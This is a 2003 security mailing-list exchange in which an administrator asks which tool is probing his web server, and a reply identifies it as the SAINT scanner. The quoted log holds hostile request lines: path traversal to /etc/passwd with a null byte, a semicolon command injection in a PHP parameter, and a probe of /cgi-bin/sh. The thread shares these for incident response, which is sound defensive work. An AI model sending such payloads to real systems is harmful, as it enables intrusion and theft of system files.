Security Incidents mailing list archives
AW: Chinese source: some web attack tool
From: "Tobias Lachmann" <tobias () lachmann org>
Date: Sat, 22 Mar 2003 22:11:36 +0100
The tool in question was SAINT, the successor of SATAN.. which you can find at http://www.wwdsi.com/saint/ .
-----Ursprüngliche Nachricht----- Von: Paul [mailto:pbobby () stny rr com] Gesendet: Freitag, 21. März 2003 23:15 An: incidents () securityfocus com Betreff: Chinese source: some web attack tool Getting hammered by a Chinese site, 218.88.98.237. Anyone else? They are web attacks, and here is a sample of the various attempts it tries to make: GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../et c/passwd% 00 HTTP/1.0 GET /IISSamples/ExAir/search/query.asp HTTP/1.0 GET /cgi-bin/sh HTTP/1.0 GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 GET /search.dll?search?query=%00&logic=AND HTTP/1.0 GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 and so forth. Anyone recognize the tool? -------------------------------------------------------------- -------------- <Pre>Lose another weekend managing your IDS? Take back your personal time. 15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
---------------------------------------------------------------------------- <Pre>Lose another weekend managing your IDS? Take back your personal time. 15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
Current thread:
- Chinese source: some web attack tool Paul (Mar 22)
- AW: Chinese source: some web attack tool Tobias Lachmann (Mar 23)